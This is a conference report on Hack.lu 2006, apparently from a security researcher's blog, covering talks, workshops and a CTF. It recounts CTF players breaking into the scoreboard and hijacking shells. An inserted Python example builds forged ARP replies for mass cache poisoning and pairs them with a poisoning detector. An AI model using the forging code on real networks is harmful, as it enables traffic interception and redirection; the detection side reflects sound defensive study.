Thursday, October 19th - Day 1

Big day, with three rooms for workshops and an Internet infrastructure security track. As I had to prepare and eventually present a WiFi workshop with Philippe Teuwen, I couldn't attend the other presentations. Too bad...

Among the six planned workshops, two were canceled: Raoul Chiesa was sick, and the other guy... Well... I don't know...

  • Using Computer Forensics at the police, by Federal Computer Crime Unit of Belgium
  • Writing Metasploit plugins, from vulnerability to exploit, by Saumil Shah. He set up a full architecture for his workshop so people could practice what they were seeing with their own laptop. I've heard somebody interfered a lot with those demos, so others couldn't play...
  • "802.11 Security, inaccessible star?", by Philippe Teuwen & Cédric "Sid" Blancher (i.e. me). Philippe, being strongly involved with the Wi-Fi Alliance, presented everything around WEP, WPA, 802.11i and WPA2. He was expected to deliver some hot news about the upcoming Wireless Protected Setup but couldn't, due to a total blackout until November 6. I presented the risks associated with open Wi-Fi networks, very similar to what I gave at BCS but more detailed.
  • Tactical VoIP: VoIPhreaking, by The Grugq. It was the same talk he's been delivering for quite some time now[1] on VoIP phreaking. After a funny introduction faking a dumb XSS talk, we had a pretty complete overview of VoIP's lack of security.
  • Raoul Chiesa, A new approach to Cybercrime: the Hacker's Profiling Project (HPP) - Canceled
  • PHP Security - Canceled

A track dedicated to Internet infrastructure security was running at the same time with various speakers:

With everything running in parallel, some were a bit disappointed at being forced to choose between presentations they were interested in. On the other hand, there were only three days, not a full week.

Friday, October 20th - Day 2

First day for the conference itself.

  • Opening by Renaud Deraison (Tenable Network Security) with a "keynote" on the security and vulnerability landscape: more and more noise, fewer and fewer serious remote flaws, hardened OSes, vendors preferring DoS over remote access, defence in depth... Renaud had a lot of things to say; it's very difficult to summarize his talk in a few lines, so have a look at his slides.
  • Towards an Invisible Honeypot Monitoring System, Nguyen Anh Quynh (Keio University, JP). Just as at EUSecWest/core06, Quynh presented Xebek, a new Sebek-like system based on Xen.
  • An empirical analysis of malware, Oliver Schmid. A pretty complete and didactic state of the art of malware analysis techniques and tools.
  • Sensible defence, Koen Maris. Risk management and its pitfalls. Don't forget the human factor, or the "chair-interface issue". Nothing new, but still interesting.
  • Lightning talks, first session...
    • Hack.lu 2005 Crypto Challenge, Claus Overbeck. How to break last year's challenge.
    • Hacking NEDAP Voting-Computers, Andreas Bogk & Hannes Mehnert. How to turn a voting machine into a chess game, how to identify voters, discover who they're voting for, etc. A technical and factual plea against black box voting. Enlightening.
  • Bluetooth Hacking revisited, Thierry Zoller & Kevin Finistere. Kevin being unavailable, Thierry gave a nice presentation of known Bluetooth flaws and some of their own discoveries, particularly a remote flaw in the MacOS OBEX file server on which they based a worm called InqTana, and a PIN cracking implementation using a hardware Bluetooth sniffer. Some demos, some very interesting info, and maybe too much blabla around their flaw.
  • Triple Play, Triple threats? - IPTV Security, Yen-Ming Chen (Foundstone). Great disappointment on this one. I was waiting for real stuff, but we barely had anything beyond Visio maps. Hoping for better at PacSec/core06...
  • IPv6 Security and insecurity, Van Hauser (THC). Roughly the same talk as at CanSecWest/core06 and other places, with minor updates. Interesting for people discovering IPv6 and its security.
  • Smashing Heap by Free Simulation, Sandip Chaudhari. This guy showed an interesting approach to exploiting heap overflows: simulating a free chunk at a place he controls in memory, such as the stack. Thus he could exploit heap overflows pretty easily on AIX and Solaris.
  • DNS Security, Daniel Karrenberg. I hate to say this[3] about someone who obviously masters the subject, but this talk was pretty boring. Open DNS servers are bad, beware of cache poisoning and DNS spoofing, and use DNSSEC. I may have missed something great, but it looked like a five-year trip back in time...

The organizers had initially canceled the CTF challenge, but HackerJoe proposed one at the last minute, allowing 6 teams to compete over 7 levels. Two of them went particularly far that day: the German guys from RedTeam and the Frenchies from the Bisounours team[4], the latter being one level ahead at the end of the day.

Then came the awaited speakers' dinner at La Coque restaurant. A great moment, but somehow, our Bisounours friends were still deep into the challenge...

Saturday, October 21st - Day 3

Last day for Hack.lu, not much sleep...

  • Software Engineering Security by Wietse Venema, well-known author of TCP Wrappers, SATAN and Postfix. I was expecting something very similar to what I presented at SecureCon, but he focused on secure file deletion, demonstrating how little hidden details can prove you completely wrong. Better use encrypted file systems...
  • Security in Grid Computing, Lisa Thalheim. Her talk was not that technical, but it was a very good overview of the security issues you can encounter in a grid computing environment, from the grid itself to application development and privilege handling.
  • Secure networking, Hannes Mehnert & Andreas Bogk. They presented an IP stack developed in the Dylan programming language with security in mind. They claim it to be flawless. Interesting approach, good points. Very good talk; these guys definitely have a clue there.
  • WiFi Advanced Stealth, Laurent Butti & Franck Veysset. They presented and demonstrated their work on stealth WiFi communications, using altered management or control frames to establish wireless covert channels. They also said a word about WiFi stack fuzzing. Great talk.
  • Lightning talks, second session...
    • Mobile Voice Encryption, Frederico Moro. An initiative to push for an open encryption standard.
    • HPP - The Hacker Profiling Project, Raoul Chiesa. Being sick on Thursday, he had to cancel his workshop. So he decided to present the project as a lightning talk. Anonymous forms are used for hackers to define themselves. Though one can question this approach, they have interesting results. They still have to promote this initiative, as most of the crowd had never heard of it...
    • Fire in the Skype, the Bisounours edition, Cédric 'Sid' Blancher. I was asked to present this lightning talk from Recon 2006 to illustrate overlay network risks. So I did.
    • Fast Software Encryption 2007 presentation. This event is dedicated to symmetric ciphers. Not interested? Just have a look at the program committee...
  • Exploiting hidden services to set up an anonymous communication infrastructure, Fabio Pietrosanti, who presented the basic concepts of anonymous infrastructures, their implementation and their increasing usage on the Internet, as well as some good ideas to enhance them, especially regarding the provision of anonymous services. He focused on Laissez Faire Island as a way to provide them. He mentioned this live video feed through Tor at ToorCon as a way to hide the speakers' location. I was quite puzzled... Those guys don't have a credit card, a driving licence? They don't receive mail, don't pay taxes? I mean, there are so many ways to locate somebody that I don't really see the point of this, beyond demonstrating one's ability to use Tor...
  • Broadcasting by Misuse of Satellite ISPs, Andre Adelsbach. Strange. Satellites are a pretty hot topic these days, but I wasn't impressed at all by this talk. Basically, an insider can broadcast traffic by breaking an encryption scheme he partially knows. Interesting though for those who are not familiar with satellite broadcasting systems.
  • How to find anything underneath the commercial web: Powersearching without google, Fravia. Apart from the fact that he uses Google a lot, this talk explains how to search for very specific things while avoiding commercial and pointless stuff. Worth reading, unless you already had a look at his previous presentations, like the one at Recon 2006.
  • RedTeam and Bisounours then presented their achievements at the Hack.lu 2006 CTF, which they both completed... And more...
  • Web Hackers vs Search Engines and more, Laurent Oudot. The Rstack founder presented nice findings on search engine algorithms and ways to artificially increase your rank for arbitrary requests. As an example, if you look for "Laurent Oudot" on Yahoo!, the first link will be Slashdot, although they haven't mentioned him for years[5]. He showed some similar tricks on Google and MSN, even a Yahoo!-based port scanner, and concluded with some interesting leads for future work.
  • Closing speech.

Bisounours

About the CTF challenge... The Bisounours team validated the last level early in the morning, around 6am, winning the game. They managed to break into the scoreboard database so they could modify their entry, showing a validation at 03:13:37. Barely anybody noticed this joke. Then RedTeam finished around 1pm. In fact, while the Bisounours were at the speakers' dinner, RedTeam stayed at the hotel, where the conference wireless access was down, so they were not able to download the FreeBSD images they needed to validate Level 3. At the same time, the fluffy bears were enjoying the free high-speed WiFi connection at the dinner's location to download everything they wanted. Who said it was cheating? From there, both teams tried to take over the CTF host. While RedTeam was getting root access, the Bisounours were cracking their password so they could take advantage of the other team's shell. They did :) We could see many modifications to the scoreboard, with a brand new "Level 8", then a "Final Stage (not for girls)", quickly followed by "Teh Purp1e Styl3sh33t and Fri3z". As it got more and more difficult to log on to the host, with shells being killed and binaries deleted, I was hired to set up a global network redirection to a controlled mirror web server using ARP cache poisoning so we could feed our own scoreboard. It worked for a moment, and the CTF was definitively closed as it was beginning to monopolize most of the wireless network bandwidth. At least I could prove arp-sk to be a very powerful and versatile tool, achieving a mass poisoning arpspoof couldn't do easily, and demonstrate some stuff I had presented two days before ;) Maybe next time, I'll have a Wifitap-based HTTP traffic poisoner...
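To make the mass ARP cache poisoning mentioned above concrete, here is an added example (mine, not the post's own code nor arp-sk): it builds the unsolicited "is-at" ARP replies a poisoner sends to every victim to claim the gateway's IP, and, on the defensive side, a small check that flags one IP being claimed by two different MACs, the way arpwatch-style tools catch exactly this trick. All MAC and IP addresses are constructed for the example; the frames are built as bytes only and nothing is put on the wire.

```python
"""Forged ARP replies (mass poisoning) and a conflicting-mapping detector.

Added example, not code from the original report. Addresses are made up.
"""
import struct
import ipaddress

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying an ARP 'is-at' reply (42 bytes).

    Sent unsolicited, it overwrites target's cache entry for sender_ip with
    sender_mac: that is the whole poisoning primitive.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)       # Ethernet/IPv4, reply
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def poison_batch(attacker_mac, gateway_ip, victims):
    """Mass poisoning: one forged reply per (victim_mac, victim_ip) claiming
    that gateway_ip lives at attacker_mac, so victims' traffic to the gateway
    (e.g. HTTP to the scoreboard) is delivered to the attacker instead."""
    return [build_arp_reply(attacker_mac, gateway_ip, vmac, vip) for vmac, vip in victims]


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet/IPv4 ARP frame, or None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sha": mac_str(frame[22:28]), "spa": str(ipaddress.IPv4Address(frame[28:32])),
        "tha": mac_str(frame[32:38]), "tpa": str(ipaddress.IPv4Address(frame[38:42])),
    }


def detect_poisoning(frames, trusted=None):
    """Flag IPs claimed by more than one MAC in ARP replies.

    `trusted` optionally seeds the table with known-good IP -> MAC pairs
    (like a static ARP table), so a single forged reply is enough to alert.
    Returns a sorted list of (ip, set_of_macs).
    """
    seen = {ip: {mac} for ip, mac in (trusted or {}).items()}
    for frame in frames:
        p = parse_arp(frame)
        if p is None or p["op"] != ARP_REPLY:
            continue
        seen.setdefault(p["spa"], set()).add(p["sha"])
    return sorted((ip, macs) for ip, macs in seen.items() if len(macs) > 1)


if __name__ == "__main__":
    # Constructed scenario: a real gateway reply, then the poisoner's batch.
    legit = build_arp_reply("00:aa:bb:cc:dd:01", "10.0.0.1", "00:aa:bb:cc:dd:02", "10.0.0.2")
    forged = poison_batch("00:11:22:33:44:55", "10.0.0.1",
                          [("00:aa:bb:cc:dd:02", "10.0.0.2"), ("00:aa:bb:cc:dd:03", "10.0.0.3")])
    for ip, macs in detect_poisoning([legit] + forged):
        print(f"ALERT: {ip} claimed by {sorted(macs)}")
```

The detector only ever sees what a sniffer on the segment sees, so in practice you feed it replies captured with a pcap library; note that a poisoner who is also the first to answer for an IP the monitor has never seen will not trip the conflict check unless the trusted table is seeded.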

My conclusion: very good conference.

If you need another point of view, you should try other reports[6]:

You can also find my pictures online.

Notes

[1] Noticed the HiTB in filename ?

[2] French RENATER equivalent for Switzerland.

[3] Yes, yes, I do !

[4] Fluffy bears...

[5] They might be soon...

[6] If you have written a report too, just drop a trackback (see URL below) or email me; I will add it to this list. Thx.